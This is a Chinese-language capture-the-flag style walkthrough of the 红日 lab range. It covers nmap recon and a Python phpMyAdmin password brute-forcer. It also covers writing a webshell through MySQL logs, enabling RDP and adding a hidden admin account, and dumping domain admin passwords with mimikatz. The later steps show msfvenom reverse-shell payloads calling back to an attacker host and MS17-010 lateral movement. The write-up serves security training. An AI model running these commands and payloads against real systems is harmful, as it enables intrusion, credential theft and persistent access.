【Penetration】红日靶场（一）

nmap探查存活主机

nmap -sP 10.10.2.0/24

图片: https://uploader.shimo.im/f/cfuQ653BEvyA42FR.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

nmap探查目标主机服务

nmap -sV 10.10.2.145

图片: https://uploader.shimo.im/f/NAPgMmL8pPSn4aqp.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

很多不认识的服务，只能一个个去百度了

对msrpc服务进行探测

msrpc MS Remote Procedure Control

直接谷歌，看看有没有可以利用的

发现一个MS08-067漏洞---MSRPC over SMB，测试了暴露出来的所有端口，并无结果

对MySQL服务进行探测

对服务进行进一步探测

use auxiliary/scanner/mysql/mysql_version

服务确实存在，本想着直接使用 mysql_sql直接连接，然后执行，但似乎没用，猜测是不是只允许内网访问

尝试使用mysql_login模块进行密码爆破

搞了好久，发现有些模块在测试的时候，把ip地址输入错误了，只能重来

百度了，说unauthorized就是不允许访问的意思，估计就是只限内网访问把

对ssl/ms-wbt-server

貌似不好利用，等下再来

对http服务进行探测

网站信息收集

网站的绝对路径是 C:/phpStudy/WWW

数据库采用的是 mysql

php 版本5.4.45

图片: https://uploader.shimo.im/f/dVfiMM4AaXqJGezF.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

直接访问，是一个phpStudy探针，应该就是和phpinfo差不多的东西把

10.10.2.145/l.php

看看探针，为什么下面测试的密码是对的？？？

图片: https://uploader.shimo.im/f/DPmRk4aSwrrSluBA.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

抓包发现密码是root/root.就是不知道是真的，还是仅仅是探测密码！！！所以开发人员要注意，避免密码泄露

似乎没什么了，先扫描一下目录把

网站返回403，还是需要关注下，这只是说明没有权限访问，但是还是可能存在的

DirBurst直接扫描目录，发现了phpmyadmin，而且密码好像就是root/root，不知道是不是有缓存的原因，，将密码改动了下，再次进行仿真探测

还扫描到了之前上传的 木马，哈哈哈哈，事实证明信息收集很重要

这里还有另外一条路子，就是其实还有一个cms站，里面也有东西，可以直接修改模板，最后叶形成webshell

对phpmyadmin进行密码爆破，但结果发现都是302转发，那怎么判断密码是否正确呢？好像可以设置跟着跳转，又学会了一个新技巧

对phpmyadmin爆破时有个关键点，就是每次访问都会换一个token，所以直接用bp似乎是没法爆破的，除非能自动匹配token并将token放在请求头

图片: https://uploader.shimo.im/f/jKDkmUs8iAAGhLC0.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

直接在网上巴拉了个脚本

from requests import session

from re import findall

from html import unescape

phpmyadmin地址,例如 http://localhost/index.php

target = 'http://localhost/index.php'

要爆破的用户名

user = 'root'

密码字典文件路径

passdic = 'password.txt'

ss = session()

ss.headers = {'Accept': '/', 'Accept-Encoding': 'gzip, deflate',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)

Chrome/87.0.4280.88 Safari/537.36'}

def get_token(text) -> str:

# 获取token

token = findall("name="token" value="(.*?)" />", text)

return unescape(token[0]) if token else None

def get_title(text) -> str:

# 获取标题

title = findall('(.*)', text)

return title[0] if title else None

def try_login(user, pwd, token):

# 尝试登陆

data = {'pma_username': user,

'pma_password': pwd,

'server': 1,

'target': 'index.php',

'token': token}

r = ss.post(url=target, data=data)

return r.text

def burst_pma():

# 爆破

with open(passdic, 'r', encoding='utf-8') as f:

html = try_login('', '', '')

title_fail = get_title(html)

token = get_token(html)

for line in f:

pwd = line.strip()

print(f'[?] loading... {user} {pwd} ')

html = try_login(user, pwd, token)

title = get_title(html)

token = get_token(html)

if title != title_fail:

print(f'[√] success {title}')

with open('success.txt', 'a', encoding='utf-8') as f:

f.write(f'{target} | {user} | {pwd}\n')

break

else:

print(f'[×] failed {title}')

try:
    if __name__ == "__main__":
        burst_pma()
except Exception as e:
    print(e)

最后爆破出了密码 123456

拿到phpmyadmin ，直接尝试写入webshell，参考webshell需要什么？？

直接写webshell到刚开始的网站目录下 C:/phpStudy/WWW

发现开启了secure_file_priv ，无法对文件直接写入，尝试log写入，log包括正常log，慢日志，错误日志

成功写入webshell，mima pJack直接连antsword，但似乎连不上，可能有各种原因把，这个时候就尝试用各种webshell工具连接，最终用开山符连接上了

进入内网渗透环节

开山斧似乎无法打开shell，尝试用msfvenmon生成反弹shell，然后上传到靶机，并执行，但好像也要执行命令行执行才行。

换了菜刀，这下文件，shell终于都可以操作了

先用命令行开启3389，可以避免被杀毒软件发现

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /F

reg add    "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0

成功 添加一个用户，并将其添加至本地管理员组和远程桌面组，用于远程桌面访问

net user aur0ra 123.com

net localgroup "Remote Desktop Users" aur0ra /add

net localgroup Administrator aur0ra /add

远程桌面访问会挤出另外一个用户，极有可能被发现，怎么处理？

暂时先直接在靶机上开启，但应该有命令行操作组策略的方法

内网渗透

信息收集

操作见另外一章

1.获取DC

2.通过本地用户，来猜测是否是域用户

3.密码提取工具获取密码，并将密码作为一个字典，用于爆破其他用户

使用mimikatz，抓取密码，但貌似失败了，原因是没有以管理员身份打开

使用mimikatz抓取密码：提权，抓取

aur0ra/123.com

Administrator/123.com

猜测该用户会不会就是域管理员

好家伙，真就是域管理员，那后面不久随意飘了

收集到的信息

域为 god.org

DC---192.168.52.128

获取域用户

Administrator/123.com

通过bat脚本获取系统架构信息

到此已经拿下一台主机

接着以该主机为跳板，递归搜索其他信息

为了集中管理，将所有的会话交给msf

先用msfvenom生成exp，windows优先生成ps脚本，不容易被查杀

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.2.149 LROST=6666 -f psh-reflection > /tmp/evil.ps1

再通过菜刀将文件上传，msf开启监听

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

...

由于是接着渗透，所以不知道为什么出现3389连接不上，原来是添加的用户仅仅是本地用户，但登录的时候用的是域用户登录的

但还是不能解决单点登录的问题，在这里直接在靶机上，或者通过rdektop临时操作，但实际情况下，会把对方挤下线，从而被发现，所以这中方式肯定是不行的用工具后面自己解决

先学用命令行操作注册表、组策略

再打开3389多点登录的问题

图片: https://uploader.shimo.im/f/jJTDrG7ocXsTyM1P.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

直接在powershell中执行脚本，发现失败，应该是策略禁止powershell执行

对powershell不同的限制策略

https://blog.csdn.net/Jeffxu_lib/article/details/84710386

修改组策略

Get-ExecutionPolicy 查看ps策略

Get-ExecutionPolicy -List 查看所有的策略

Set-ExecutionPolicy unrestricted修改策略为松

修改失败，发现只能用管理员

不管怎么样都反弹失败，换个exe试试？

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.2.141 LPORT=9999 -f exe -o 123.exe

msfvenom 自动生成木马

还是一样，上传，执行

成功反弹shell

图片: https://uploader.shimo.im/f/wxvnmd9x3EyXlKbf.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

又到了提权阶段

kali中运行Windows-Exploit-Suggester工具

use post/multi/recon/local_exploit_suggester

图片: https://uploader.shimo.im/f/aAtdJ4FtbbxrRyQf.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

不知道为什么提权都失败了

用 background 将会话挂起，想用再用 sessions -i 进行交互就行，还可以使用shell进入靶机命令行

横向咯

先对内网进行扫描，很多东西，这里利用msf自带的扫描模块auxiliary/scanner/netbios/nbname

尽量用一些比较底层的协议进行探测，不容易被发现

使用自带的ping探测

for /L %I in (1,1,254) DO @ping -w 1 -n 1 10.10.2.%I | findstr 0%

这里有点问题，就是findstr的用法。加了双引号和不加的区别

search scanner看msf中的探测模块类型

下面主要常用的扫描模块

auxiliary/scanner/netbios/nbname #探测内网主机的netbios名字

auxiliary/scanner/discovery/arp_sweep #基于arp协议发现内网存活主机，这不能通过代理使用

auxiliary/scanner/portscan/ack #基于tcp的ack回复进行端口扫描，默认扫描1-10000端口

auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描，默认扫描1-10000端口

auxiliary/scanner/discovery/udp_sweep #基于udp协议发现内网存活主机

auxiliary/scanner/discovery/udp_probe #基于udp协议发现内网存活主机

auxiliary/scanner/netbios/nbname #基于netbios协议发现内网存活主机

auxiliary/scanner/ftp/ftp_version #发现内网ftp服务，基于默认21端口

auxiliary/scanner/ssh/ssh_version #发现内网ssh服务，基于默认22端口

auxiliary/scanner/telnet/telnet_version #发现内网telnet服务，基于默认23端口

auxiliary/scanner/dns/dns_amp #发现dns服务，基于默认53端口

auxiliary/scanner/http/http_version #发现内网http服务，基于默认80端口

auxiliary/scanner/http/title #探测内网http服务的标题

auxiliary/scanner/smb/smb_version #发现内网smb服务，基于默认的445端口

use auxiliary/scanner/mssql/mssql_schemadump #发现内网SQLServer服务,基于默认的1433端口

use auxiliary/scanner/oracle/oracle_hashdump #发现内网oracle服务,基于默认的1521端口

auxiliary/scanner/mysql/mysql_version #发现内网mysql服务，基于默认3306端口

auxiliary/scanner/rdp/rdp_scanner #发现内网RDP服务，基于默认3389端口

auxiliary/scanner/redis/redis_server #发现内网Redis服务，基于默认6379端口

auxiliary/scanner/db2/db2_version #探测内网的db2服务，基于默认的50000端口

auxiliary/scanner/discovery/arp_sweep

图片: https://uploader.shimo.im/f/lgt9NUQ1cyGmRJip.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

所以内网主机还有 192.168.52.128|141

对端口服务进行扫描

use auxiliary/scanner/portscan/tcp

对80 445 3389 端口进行扫描

图片: https://uploader.shimo.im/f/0ZEVIYJn4vWzCu2b.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

看看是否存在 ms17-010永恒之蓝漏洞

图片: https://uploader.shimo.im/f/kfodN5tVNiXptPyE.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

还真有

直接使用ms17-010-command执行命令

auxiliary/admin/smb/ms17_010_command

图片: https://uploader.shimo.im/f/VmSQdsD2Rybxcuy5.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

怎么发现又反弹失败呢（以后还是一鼓作气搞完把），exe也没用了，看看还有什么其他的

害，不管了，反正后面就是关于cs和msf联动的东西了，道理都是一样的